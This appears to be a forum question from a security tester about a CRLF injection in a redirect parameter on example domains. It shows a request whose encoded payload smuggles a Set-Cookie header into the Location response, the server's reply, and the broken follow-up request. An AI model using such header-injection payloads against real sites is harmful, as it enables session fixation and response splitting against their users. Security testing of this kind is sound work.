During a security assessment on a website I found a a redirection link that was reflecting the values in the Location header. The first thing that came to my mind was CRLF injection so I tried a few variation of "%0a"
and managed to include my payload in the response:
Request:
"https://ads.example.com/promoredir?redirect=http%3A%2F%2Fmain.example.com%2F%E5%98%8A%E5%98%8DSet-Cookie:%20test"
Response:
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Jul 2015 14:18:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=5C24F2C96CE37DAA026591F5CAD91900; Path=/; Secure; HttpOnly
Location: mail.example.com
Set-Cookie: test
Content-Length: 0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8
However when I follow the redirection, my request changes to the following:
GET /Set-Cookie:%20test" HTTP/1.1
Host: main.example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Where am I going wrong here?